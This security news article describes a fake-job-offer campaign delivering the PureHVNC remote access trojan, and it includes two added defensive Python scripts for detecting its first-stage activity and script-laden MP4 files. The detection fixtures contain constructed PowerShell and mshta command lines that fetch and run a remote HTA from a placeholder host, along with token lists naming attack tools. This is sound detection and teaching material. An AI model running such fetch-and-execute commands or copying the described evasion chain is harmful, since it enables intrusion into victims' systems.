Cyber attackers are stepping up their game, blending advanced malware with convincing social engineering tactics to fool even the most cautious users. A new campaign discovered by Netskope Threat Labs shows how hackers are using fake job offers, complex scripting, and stealthy malware known as PureHVNC to gain remote control over victims’ systems.
This wave of cyberattacks is particularly dangerous due to its multi-layered structure, reliance on legitimate system tools, and a highly evasive approach that makes detection incredibly difficult. From fake job listings to weaponized PowerShell scripts and advanced persistence mechanisms, the threat actors behind this campaign are employing a full arsenal of modern hacking techniques.
Stealthy Malware Hides Behind Fake Job Offers: A Full Breakdown
Security experts have uncovered a well-coordinated cyber campaign that uses the PureHVNC Remote Access Trojan (RAT) alongside fake job offers to target unsuspecting individuals. The infection chain begins with phishing emails or rogue downloads disguised as job opportunities from high-profile brands in industries like fashion, fragrance, and jewelry.
Once a victim opens the disguised file, typically an .LNK file masquerading as a PDF, an embedded PowerShell script runs quietly in the background. This script is encoded in Base64 and uses Windows tools like Set-Clipboard and IEX (Invoke-Expression) to retrieve and execute a remote HTML Application (HTA) file via mshta.exe.
The attackers don't stop there. They chain several scripting languages, including JavaScript, AutoIt, and more PowerShell, to layer the infection and maintain persistence. To further avoid detection, the malicious files are hidden inside what appear to be large MP4 video files padded with useless data, obscuring the JavaScript payloads within.
AutoIt, a legitimate Windows automation tool, plays a crucial role. It helps in executing more obfuscated scripts and deploying additional components like Guard.exe, which are then embedded deeper into the system through cleverly designed startup routines. These routines ensure the malware reactivates each time the computer is rebooted.
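The first-stage behaviours described above (a Base64-encoded PowerShell command that uses Set-Clipboard and IEX, mshta.exe launched from PowerShell to fetch an HTA, and a shortcut placed in the Startup folder) all leave traces in process-creation and file-creation telemetry. The script below is an added example, not code from the article or from Netskope Threat Labs: it decodes an encoded PowerShell command line and flags those patterns over a handful of constructed Sysmon-style events. Every hostname, path, and command line in it is invented for the demonstration.

```python
"""Triage of the first-stage behaviours described in the article.

Added example, not code from the article or from Netskope Threat Labs.
Every hostname, path and command line below is constructed for the demo.
"""
import base64
import re
from typing import Iterable, Optional

# Tokens the report ties to the first stage: PowerShell using Set-Clipboard
# and IEX (Invoke-Expression), and mshta.exe fetching a remote HTA file.
SUSPICIOUS_TOKENS = ("invoke-expression", "iex", "set-clipboard", "get-clipboard", "mshta")

# PowerShell accepts several spellings of the encoded-command switch.
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# A shortcut dropped in the Startup folder runs at every logon.
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload as text (PowerShell encodes it as UTF-16LE), else None."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: dict) -> list:
    """Return findings for one event; an empty list means nothing was flagged."""
    findings = []
    if event["type"] == "process_create":
        cmd = event["cmdline"]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded PowerShell command line")
        # Inspect the visible command line plus the decoded payload, with the
        # Base64 blob removed so it cannot produce chance substring matches.
        text = (ENCODED_FLAG_RE.sub(" ", cmd) + " " + (decoded or "")).lower()
        hits = [t for t in SUSPICIOUS_TOKENS if re.search(r"\b" + re.escape(t) + r"\b", text)]
        if hits:
            findings.append("suspicious tokens: " + ", ".join(hits))
        if event["image"].lower().endswith("mshta.exe") and event["parent_image"].lower().endswith("powershell.exe"):
            findings.append("mshta.exe spawned by powershell.exe")
    elif event["type"] == "file_create":
        if STARTUP_LNK_RE.search(event["path"]):
            findings.append("shortcut written to Startup folder (persistence)")
    return findings


def triage(events: Iterable[dict]) -> dict:
    """Run triage_event over a stream and keep only the events that produced findings."""
    results = {}
    for index, event in enumerate(events):
        findings = triage_event(event)
        if findings:
            results[index] = findings
    return results


def _encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events in the shape of Sysmon process-creation (1) and file-creation (11) records.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": _PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + _encode("Set-Clipboard 'https://lure.example.invalid/offer.hta'; IEX (Get-Clipboard)")},
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe", "parent_image": _PS,
     "cmdline": "mshta.exe https://lure.example.invalid/offer.hta"},
    {"type": "file_create", "image": r"C:\Users\victim\AppData\Local\Temp\Guard.exe",
     "path": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guard.lnk"},
    {"type": "process_create", "image": _PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},  # benign admin use, should stay quiet
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["image"].rsplit("\\", 1)[-1], findings)
```

In a real deployment the event dictionaries would be populated from Sysmon Event ID 1 (Image, ParentImage, CommandLine) and Event ID 11 (TargetFilename) or the equivalent EDR fields; the decoding step matters because the tokens only become visible after the Base64 and UTF-16LE layers are stripped.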
The attackers have also taken significant steps to avoid detection. Their scripts run several checks to identify virtual machines, sandbox environments, or antivirus software. If found, the scripts either stop execution or adjust behavior to slip under the radar.
One of the most alarming aspects is the use of process hollowing, a technique where a legitimate system process is launched in a suspended state, then replaced with malicious code. This makes the malware blend seamlessly into normal system activity. Once deployed, the final payload decrypts and loads the PureHVNC RAT, a tool that gives hackers full remote access to the system, allowing them to upload and download files, spy on users, and even deploy more malware.
Researchers highlight the highly modular nature of the PureHVNC tool, which allows attackers to modify and update it frequently, making it especially resilient to traditional antivirus or endpoint protection solutions. Its stealth, persistence, and adaptability make this one of the most complex malware campaigns seen in recent months.
What Undercode Says:
This campaign is a perfect example of how cybercrime is no longer limited to brute-force hacks or spam emails. It's evolved into a psychological and technical game of chess. Attackers are no longer relying solely on the weaknesses of systems, but rather, the vulnerabilities of human behavior.
Let's begin with the lure: job offers. In an era where remote work is booming and layoffs are frequent, this social engineering angle hits a sensitive nerve. A fake offer from a known fashion or perfume brand carries both appeal and credibility, making it dangerously effective.
The infection chain itself reveals a deep understanding of both system internals and user psychology. Using .LNK files that mimic PDFs is not a new trick, but still highly effective. Most users don't look at file extensions carefully, especially when they're expecting a document.
PowerShell remains a favorite among attackers for good reason: it's native to Windows, powerful, and often overlooked by traditional antivirus software. But it's not just about PowerShell; the use of AutoIt, mshta.exe, and even process hollowing paints a picture of a well-funded, professional group.
Obfuscation techniques, such as disguising malware as bloated MP4 files, show the level of effort put into bypassing content scanning and heuristic-based detection. Similarly, embedding scripts within HTML and using eval() for execution adds another layer of stealth, making reverse engineering and analysis far more challenging.
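One concrete check for the disguise described above: does a file that claims to be MP4 video (by its name and by a valid header) carry script text anywhere in its body? The Python below is an added example, not from the article or the Netskope report. The two sample "files" in it are constructed in memory around a harmless stub, and the marker list is a starting point for such a scanner, not the research team's signatures.

```python
"""Spotting script text hidden in an oversized "MP4" file.

Added example, not code from the article or from Netskope Threat Labs. The
two sample files below are constructed in memory; no real payload is used.
"""
import struct

# Substrings that have no business inside a video container.
SCRIPT_MARKERS = (b"<script", b"eval(", b"ActiveXObject", b"WScript", b"powershell")


def has_mp4_signature(data: bytes) -> bool:
    """True if the file opens with an ISO base-media 'ftyp' box, as real MP4 files do."""
    return len(data) >= 8 and data[4:8] == b"ftyp"


def find_script_markers(data: bytes) -> list:
    """Return (offset, marker) pairs for every script marker found anywhere in the file."""
    hits = []
    for marker in SCRIPT_MARKERS:
        start = 0
        while True:
            pos = data.find(marker, start)
            if pos < 0:
                break
            hits.append((pos, marker.decode("ascii")))
            start = pos + 1
    return sorted(hits)


def classify(filename: str, data: bytes) -> str:
    """Classify a file by the mismatch between what it claims to be and what it contains."""
    if not filename.lower().endswith(".mp4"):
        return "not-an-mp4-name"
    if not has_mp4_signature(data):
        return "mp4-name-without-mp4-header"
    return "mp4-with-embedded-script" if find_script_markers(data) else "clean"


def _ftyp_box() -> bytes:
    """Constructed minimal 'ftyp' box: size, type, major brand, minor version, compatible brand."""
    body = b"isom" + struct.pack(">I", 0x200) + b"isom"
    return struct.pack(">I", 8 + len(body)) + b"ftyp" + body


# Constructed samples: junk filler (the "useless data" the report describes)
# around a harmless script stub, and a clean file that holds only filler.
_FILLER = bytes(range(256)) * 16
SAMPLE_DISGUISED = _ftyp_box() + _FILLER + b"<script>eval('placeholder');</script>" + _FILLER
SAMPLE_CLEAN = _ftyp_box() + _FILLER

if __name__ == "__main__":
    for name, blob in (("offer.mp4", SAMPLE_DISGUISED), ("clip.mp4", SAMPLE_CLEAN)):
        print(name, len(blob), "bytes:", classify(name, blob), find_script_markers(blob))
```

Scanning the whole body rather than only the first few kilobytes is the point: a valid header passes a magic-number check, and the padding is there precisely so that a size-limited or header-only scanner never reaches the script.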
The persistence mechanisms employed, placing shortcuts in the Windows Startup directory, demonstrate the attackers' intent to maintain long-term access. Once infected, the victim isn't just compromised for a moment, but indefinitely.
Perhaps the most alarming part is the adaptability. By using environmental checks, the malware alters its behavior depending on where it’s running. This is a key marker of modern malware sophistication. It’s also a sign that this is not a one-off attack, but part of a larger, evolving threat landscape.
From a defense perspective, this campaign underscores the need for layered security. Relying solely on signature-based antivirus is no longer sufficient. Behavioral analysis, endpoint detection and response (EDR), and user education must all work together to build a resilient defense.
Organizations should also be aware that even legitimate automation tools like AutoIt can be weaponized. Every executable, every script should be monitored, especially those behaving in ways inconsistent with their purpose.
Fact Checker Results
The techniques described are consistent with known PureHVNC RAT behavior.
Obfuscation methods like process hollowing and environmental checks are widely used by advanced threat actors.
Social engineering tactics using job offers have increased significantly since 2023.
Prediction:
As this campaign shows, PureHVNC is not just another RAT. Its modular structure, stealth features, and adaptability signal an emerging trend: next-generation malware that blends technical precision with psychological manipulation. Expect future campaigns to adopt similar tactics, possibly moving beyond job scams into dating apps, freelance platforms, and social media. The goal will remain the same: gain trust, bypass defenses, and stay undetected for as long as possible.
References:
Reported By: cyberpress.org